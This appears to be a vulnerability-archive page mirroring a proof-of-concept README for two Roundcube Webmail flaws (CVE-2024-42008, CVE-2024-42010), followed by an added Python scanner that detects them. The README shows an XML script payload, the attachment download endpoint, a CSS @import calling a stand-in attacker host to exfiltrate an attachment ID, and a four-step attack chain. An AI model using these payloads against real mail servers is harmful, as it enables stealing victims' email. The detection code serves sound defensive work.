Related vulnerability
Title:
Roundcube Webmail security vulnerability
(CVE-2024-42008)
Description: Roundcube Webmail is an open-source, browser-based IMAP client that supports address book management, message search, spell checking and more. Roundcube Webmail versions up to and including 1.5.7, and 1.6.x versions before 1.6.8, contain a cross-site scripting vulnerability: a remote attacker can steal and send the victim's email via a malicious email attachment with a dangerous Content-Type header.
Description
PoC of Roundcube vulnerabilities CVE-2024-42008 and CVE-2024-42010
Introduction
### Proof of Concept: CVE-2024-42008 and CVE-2024-42010
This proof of concept (PoC) demonstrates the exploitation of two vulnerabilities in Roundcube Webmail that together enable CSS injection and cross-site scripting (XSS). The attack consists of two stages:
1. **XSS via malicious XML attachment (CVE-2024-42008)**
Because of insufficient file upload checks, an XML file containing JavaScript can be sent as an attachment, e.g.
```xml
<something:script xmlns:something="http://www.w3.org/1999/xhtml">
alert(origin)
</something:script>
```
This was a known issue, tracked as CVE-2020-13965, and the mitigation was to disable the "Open attachment" option. The file can still be accessed directly, however, through the endpoint
```
https://roundcube.host.com/?_task=mail&_mbox=INBOX&_uid=[UID]&_part=2&_download=0&_action=get
```
Where UID is the unique identifier for this particular attachment in this particular mailbox (i.e. INBOX).

2. **HTML exfiltration via CSS injection (CVE-2024-42010)**
When sending an email, it is possible to inject your own CSS stylesheet, provided it is hosted on a domain that starts with `a`. Combined with a JavaScript server that processes the requests made by the vulnerable Roundcube host, this makes it possible to extract the UID of the malicious XSS attachment.
Import the CSS in a sent email with
```html
<style>
@import "//a.attackerdomain.com/start?"
</style>
```
Host the JS server (roundcube-css-exploit.js) that exfiltrates the UID of the malicious attachment.

**Attack Chain**
1. Host the JavaScript server on your domain.
2. Send an email with a malicious XML attachment that imports the CSS from your domain.
3. The victim opens the email and the UID gets exfiltrated.
4. Then, depending on the preferred XSS delivery method, either send a second email containing the attachment link or redirect the user to it.
**Source: [Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail (Sonar's Vulnerability Research Team)](https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail/)**
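Added defender-side example, not part of the PoC repository or the Sonar write-up: a Python scanner that flags the two mail-borne indicators described above, an XML-typed attachment carrying a (possibly namespace-prefixed) script element and an HTML body that imports a stylesheet from another host. The sample message, domain names and function names are constructed for illustration.

```python
import email
import re
from email import policy

# Content types a browser may render as XML/XHTML, where a namespaced
# <script> element executes (the CVE-2024-42008 vector).
XML_TYPES = {"text/xml", "application/xml", "application/xhtml+xml", "image/svg+xml"}
# Any element whose local name is "script", with or without a namespace prefix.
SCRIPT_RE = re.compile(r"<\s*(?:[\w.-]+:)?script\b", re.IGNORECASE)
# A CSS @import that pulls a stylesheet from another host (the CVE-2024-42010 vector).
CSS_REMOTE_RE = re.compile(r"@import\s+(?:url\()?['\"]?\s*(?:https?:)?//", re.IGNORECASE)


def scan_message(raw: bytes) -> list:
    """Return (part_index, finding) tuples for each suspicious MIME part."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for idx, part in enumerate(msg.walk()):
        if part.is_multipart():  # containers carry no payload of their own
            continue
        ctype = part.get_content_type()
        text = (part.get_payload(decode=True) or b"").decode("utf-8", errors="replace")
        if ctype in XML_TYPES and SCRIPT_RE.search(text):
            findings.append((idx, "xml-attachment-with-script"))
        if ctype == "text/html" and CSS_REMOTE_RE.search(text):
            findings.append((idx, "html-body-with-remote-css-import"))
    return findings


# Constructed sample message (hypothetical addresses and domain) exhibiting both indicators.
SAMPLE = b"""From: sender@example.invalid
To: victim@example.invalid
Subject: test
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset=utf-8

<html><body><style>@import "//a.example.invalid/start?"</style>hello</body></html>
--b1
Content-Type: application/xml; name="doc.xml"
Content-Disposition: attachment; filename="doc.xml"

<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(origin)</x:script>
--b1--
"""

if __name__ == "__main__":
    print(scan_message(SAMPLE))
```

A mail gateway or SIEM rule built on these two checks would surface the message before the victim's browser ever renders it.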
File snapshot
[4.0K] /data/pocs/011c8ae6a886f6dee6dec9936e8e8f055aa91f42
├── [208K] css.png
├── [2.2K] README.md
├── [3.1K] roundcube-css-exploit.js
└── [ 98K] xss.png
0 directories, 4 files
Notes
1. We recommend accessing the PoC through the original source first.
2. If the source is no longer available or cannot be accessed, please send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.